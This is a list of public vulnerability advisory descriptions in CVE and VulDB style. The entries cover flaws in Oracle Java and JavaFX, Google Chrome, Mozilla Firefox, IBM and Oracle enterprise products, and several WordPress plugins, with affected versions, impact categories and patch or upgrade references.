Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, and JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "insufficient validation of raster parameters" that can trigger an integer overflow and memory corruption.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
econvert in ExactImage 0.8.9 and earlier does not properly initialize the setjmp variable, which allows context-dependent users to cause a denial of service (crash) via a crafted image file.
Multiple cross-site request forgery (CSRF) vulnerabilities in the (1) node request management, (2) live management, and (3) user administration components in the console in Puppet Enterprise (PE) before 2.7.1 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 11, 9.0.1 before Update 10, 9.0.2 before Update 5, and 10 before Update 10 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to impersonate users via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the server in Cisco Unified MeetingPlace before 7.1(2.2000) allow remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCuc64903.  NOTE: some of these details are obtained from third party information.
Multiple cross-site request forgery (CSRF) vulnerabilities on the Cisco Unity Express with software before 8.0 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCue35910.
Unspecified vulnerability in the login functionality in the Reporting Module in Novell Identity Manager (aka IDM) Roles Based Provisioning Module 4.0.2 before Field Patch C has unknown impact and attack vectors.
apt 0.8.16, 0.9.7, and possibly other versions does not properly handle InRelease files, which allows man-in-the-middle attackers to modify packages before installation via unknown vectors, possibly related to integrity checking and the use of third-party repositories.
A vulnerability, which was classified as problematic, has been found in Exit Box Lite Plugin up to 1.06 on WordPress. Affected by this issue is some unknown functionality of the file wordpress-exit-box-lite.php. The manipulation leads to information disclosure. The attack may be launched remotely. Upgrading to version 1.10 is able to address this issue. The name of the patch is fad26701addb862c51baf85c6e3cc136aa79c309. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230672.
A vulnerability, which was classified as problematic, has been found in Mail Subscribe List Plugin up to 2.0.10 on WordPress. This issue affects some unknown processing of the file index.php. The manipulation of the argument sml_name/sml_email leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.1 is able to address this issue. The identifier of the patch is 484970ef8285cae51d2de3bd4e4684d33c956c28. It is recommended to upgrade the affected component. The identifier VDB-227765 was assigned to this vulnerability.
A vulnerability has been found in Exit Strategy Plugin 1.55 on WordPress and classified as problematic. Affected by this vulnerability is an unknown functionality of the file exitpage.php. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 1.59 is able to address this issue. The identifier of the patch is d964b8e961b2634158719f3328f16eda16ce93ac. It is recommended to upgrade the affected component. The identifier VDB-225265 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in MMDeveloper A Forms Plugin up to 1.4.2 on WordPress. This affects an unknown part of the file a-forms.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.4.3 is able to address this issue. The identifier of the patch is 3e693197bd69b7173cc16d8d2e0a7d501a2a0b06. It is recommended to upgrade the affected component. The identifier VDB-222609 was assigned to this vulnerability.
A vulnerability was found in OCLC-Research OAICat 1.5.61. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The attack may be initiated remotely. Upgrading to version 1.5.62 is able to address this issue. The identifier of the patch is 6cc65501869fa663bcd24a70b63f41f5cfe6b3e1. It is recommended to upgrade the affected component. The identifier VDB-221489 was assigned to this vulnerability.
A vulnerability was found in fanzila WebFinance 0.5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file htdocs/prospection/save_contact.php. The manipulation of the argument nom/prenom/email/tel/mobile/client/fonction/note leads to sql injection. The identifier of the patch is 165dfcaa0520ee0179b7c1282efb84f5a03df114. It is recommended to apply a patch to fix this issue. The identifier VDB-220057 was assigned to this vulnerability.
A vulnerability was found in fanzila WebFinance 0.5. It has been classified as critical. Affected is an unknown function of the file htdocs/admin/save_roles.php. The manipulation of the argument id leads to sql injection. The name of the patch is 6cfeb2f6b35c1b3a7320add07cd0493e4f752af3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-220056.
A vulnerability was found in fanzila WebFinance 0.5 and classified as critical. This issue affects some unknown processing of the file htdocs/admin/save_taxes.php. The manipulation of the argument id leads to sql injection. The patch is named 306f170ca2a8203ae3d8f51fb219ba9e05b945e1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-220055.
A vulnerability has been found in fanzila WebFinance 0.5 and classified as critical. This vulnerability affects unknown code of the file htdocs/admin/save_Contract_Signer_Role.php. The manipulation of the argument n/v leads to sql injection. The patch is identified as abad81af614a9ceef3f29ab22ca6bae517619e06. It is recommended to apply a patch to fix this issue. VDB-220054 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in oktora24 2moons. Affected is an unknown function. The manipulation leads to sql injection. The patch is identified as 1b09cf7672eb85b5b0c8a4de321f7a4ad87b09a7. It is recommended to apply a patch to fix this issue. VDB-218898 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in antonbolling clan7ups. Affected is an unknown function of the component Login/Session. The manipulation leads to sql injection. The name of the patch is 25afad571c488291033958d845830ba0a1710764. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218388.
A vulnerability was found in aeharding classroom-engagement-system and classified as critical. Affected by this issue is some unknown functionality. The manipulation leads to sql injection. The attack may be launched remotely. The name of the patch is 096de5815c7b414e7339f3439522a446098fb73a. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218156.
A vulnerability was found in sheilazpy eShop. It has been classified as critical. Affected is an unknown function. The manipulation leads to sql injection. The name of the patch is e096c5849c4dc09e1074104531014a62a5413884. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217572.
A vulnerability classified as problematic has been found in ethitter WP-Print-Friendly up to 0.5.2. This affects an unknown part of the file wp-print-friendly.php. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. Upgrading to version 0.5.3 is able to address this issue. The identifier of the patch is 437787292670c20b4abe20160ebbe8428187f2b4. It is recommended to upgrade the affected component. The identifier VDB-217269 was assigned to this vulnerability.
The nsrpush process in the client in EMC NetWorker before 7.6.5.3 and 8.x before 8.0.1.4 sets weak permissions for unspecified files, which allows local users to gain privileges via unknown vectors.
Use-after-free vulnerability in the extension bookmarks API in Google Chrome before 26.0.1410.43 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the Web Audio implementation in Google Chrome before 26.0.1410.43 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The IndexedDB implementation in Google Chrome before 25.0.1364.152 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
The Web Audio implementation in Google Chrome before 25.0.1364.152 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the frame-loader implementation in Google Chrome before 25.0.1364.152 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Race condition in the International Components for Unicode (ICU) functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly manage memory during message handling for plug-ins, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service (memory corruption) or possibly have other impact via unknown vectors.
Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly implement web audio nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Array index error in the content-blocking functionality in Google Chrome before 24.0.1312.56 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in the Geolocation implementation in Google Chrome before 24.0.1312.52 allows remote attackers to cause a denial of service (application crash) via unknown vectors.
The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a NUL character required for termination of an unspecified data structure, which has unknown impact and attack vectors.
The PDF functionality in Google Chrome before 24.0.1312.52 does not properly perform a cast of an unspecified variable during processing of the root of the structure tree, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Unspecified vulnerability in the 2D component in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 15 and earlier, 6 Update 41 and earlier, and 5.0 Update 40 and earlier allows remote attackers to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2013-1493.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox before 20.0 on Android allows remote attackers to cause a denial of service (stack memory corruption and application crash) or possibly execute arbitrary code via unknown vectors involving a plug-in.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 19.0, Thunderbird before 17.0.3, and SeaMonkey before 2.16 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbird before 17.0.3, Thunderbird ESR 17.x before 17.0.3, and SeaMonkey before 2.16 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 18.0, Thunderbird before 17.0.2, and SeaMonkey before 2.15 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.1, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.1, and SeaMonkey before 2.15 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.1, Thunderbird before 17.0.2, Thunderbird ESR 17.x before 17.0.1, and SeaMonkey before 2.15 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, and 5.0- Portal does not restrict unspecified size and amount values, which allows remote attackers to execute arbitrary code or cause a denial of service (resource consumption) via unknown vectors.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability on IBM WebSphere DataPower XC10 Appliance devices 2.0 and 2.1 through 2.1 FP3 allows remote attackers to bypass authentication and perform administrative actions via unknown vectors.
Unspecified vulnerability in the olch2x32 ActiveX control in IBM SPSS SamplePower 3.0 before 3.0-IM-S3SAMPC-WIN32-FP001 allows remote attackers to execute arbitrary code via unknown vectors.
The Fibre Channel over Ethernet (FCoE) feature in IBM System Networking and Blade Network Technology (BNT) switches running IBM Networking Operating System (aka NOS, formerly BLADE Operating System) floods data frames with unknown MAC addresses out on all interfaces on the same VLAN, which might allow remote attackers to obtain sensitive information in opportunistic circumstances by eavesdropping on the broadcast domain. IBM X-Force ID: 83166.
Unspecified vulnerability in IBM API Management 2.0 before 2.0.0.1 allows remote attackers to access tenant APIs, and consequently obtain sensitive information or modify data, via unknown vectors.
Unspecified vulnerability in IBM InfoSphere Guardium S-TAP 8.1 for DB2 on z/OS allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in IBM Java SDK 7 before SR4-FP1, 6 before SR13-FP1, 5.0 before SR16-FP1, and 1.4.2 before SR13-FP16 has unknown impact and attack vectors related to Class Libraries.
The Web GUI in the client in IBM Tivoli Storage Manager (TSM) 6.3 before 6.3.1.0 and 6.4 before 6.4.0.1 allows man-in-the-middle attackers to obtain unspecified client access, and consequently obtain unspecified server access, via unknown vectors.
Unspecified vulnerability in the IBM WebSphere Cast Iron physical and virtual appliance 6.0 and 6.1 before 6.1.0.15 and 6.3 before 6.3.0.1, when LDAP authentication is enabled, allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.1, 7.0 before 7.0.0.27, 8.0, and 8.5 has unknown impact and attack vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 allows remote attackers to affect integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "insufficient checks for cached results" by the Java Beans MethodFinder, which might allow attackers to access methods that should only be accessible to privileged code.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, and 5.0 through Update 38, and OpenJDK 6 and 7, allows remote attackers to affect integrity via unknown vectors related to Networking.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to avoid triggering an exception during the deserialization of invalid InetSocketAddress data.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the installation process of the client.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-0425 and CVE-2013-0426.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "incorrect checks for proxy classes" in the Reflection API.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, and 5.0 through Update 38, and OpenJDK 6 and 7, allows remote attackers to affect integrity via unknown vectors related to Libraries.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to interrupt certain threads that should not be interrupted.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-0425 and CVE-2013-0428.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to incorrect "access control checks" in the logging API that allow remote attackers to bypass Java sandbox restrictions.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-0428 and CVE-2013-0426.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to incorrect "access control checks" in the logging API that allow remote attackers to bypass Java sandbox restrictions.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the VirtualBox component in Oracle Virtualization 4.0, 4.1, and 4.2 allows local users to affect integrity and availability via unknown vectors related to Core.  NOTE: The previous information was obtained from the January 2013 Oracle CPU. Oracle has not commented on claims from another vendor that this issue is related to an incorrect comparison in the vga_draw_text function in Devices/Graphics/DevVGA.cpp, which can cause VirtualBox to "draw more lines than necessary."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7 and 8.4 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2013-0393.  NOTE: the previous information was obtained from the January 2013 CPU.  Oracle has not commented on claims from an independent researcher that this is a heap-based buffer overflow in the Paradox database stream filter (vspdx.dll) that can be triggered using a table header with a crafted "number of fields" value.
Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Services, a different vulnerability than CVE-2013-2403.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the Bind/Postinstall script for Bind package.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect integrity and availability via unknown vectors related to Utility/ksh93.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Remote Execution Service.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect integrity and availability via unknown vectors related to Utility/pax.
Unspecified vulnerability in the Agile EDM component in Oracle Supply Chain Products Suite 6.1.1.0, 6.1.2.0, and 6.1.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Base Component - Common Objects.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect availability via unknown vectors related to Kernel/DTrace Framework.
Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect integrity via unknown vectors via vectors related to Kernel/IPsec.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kernel/Boot.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect availability via unknown vectors related to Utility.
Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Filesystem/cachefs.
Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Utility/Umount.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows remote attackers to affect confidentiality via unknown vectors related to Utility/Remote Execution Server (in.rexecd).
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Diagnostics.
Unspecified vulnerability in the Application Performance Management (APM) component in Oracle Enterprise Manager Grid Control 6.5, 11.1, and 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Business Transaction Management, a different vulnerability than CVE-2013-0360.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Products 8.51 and 8.52 allows remote authenticated users to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the PeopleSoft HRMS component in Oracle PeopleSoft Products 9.0 and 9.1 allows remote attackers to affect confidentiality via unknown vectors related to Candidate Gateway.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7 and 8.4 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2013-0418.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Products 8.51 and 8.52 allows remote attackers to affect integrity via unknown vectors related to Portal, a different vulnerability than CVE-2012-5059.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Products 8.52 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Bookmarkable Pages.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the PeopleSoft HRMS component in Oracle PeopleSoft Products 9.1 allows remote attackers to affect integrity via unknown vectors related to Mobile Company Directory.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Products 8.51 and 8.52 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to PeopleCode.
Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows local users to affect confidentiality and integrity via unknown vectors related to Server Replication.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Campaign Management.
Unspecified vulnerability in the Oracle CRM Technical Foundation component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Application Framework.
Unspecified vulnerability in the Oracle Payroll component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to View Payslip.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to Siebel Calendar, a different vulnerability than CVE-2013-0378.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to Siebel Calendar, a different vulnerability than CVE-2013-0379.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Client System Analyzer.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Diagnostics.
Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.1.28 and earlier, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Server Replication.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.1, and 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Database Cloning.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.1, and 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Distributed/Cross DB Features.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 11.1.0.1 and 12.1.0.1; EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Distributed/Cross DB Features.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Products 8.51 and 8.52 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Query.
Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
Unspecified vulnerability in the Mobile Server component in Oracle Database Mobile/Lite Server (formerly Oracle Database Lite) 10.3.0.3 and 11.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-0361.
Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Mobile Server component in Oracle Database Mobile/Lite Server (formerly Oracle Database Lite) 10.3.0.3 and 11.1.0.0 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2013-0362 and CVE-2013-0363.
Unspecified vulnerability in the Mobile Server component in Oracle Database Mobile/Lite Server (formerly Oracle Database Lite) 10.3.0.3 and 11.1.0.0 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2013-0362 and CVE-2013-0364.
Unspecified vulnerability in the Mobile Server component in Oracle Database Mobile/Lite Server (formerly Oracle Database Lite) 10.3.0.3 and 11.1.0.0 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2013-0363 and CVE-2013-0364.
Unspecified vulnerability in the Mobile Server component in Oracle Database Mobile/Lite Server (formerly Oracle Database Lite) 10.3.0.3 and 11.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-0366.
Unspecified vulnerability in the Application Performance Management (APM) component in Oracle Enterprise Manager Grid Control 6.5, 11.1, and 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Business Transaction Management, a different vulnerability than CVE-2013-0396.
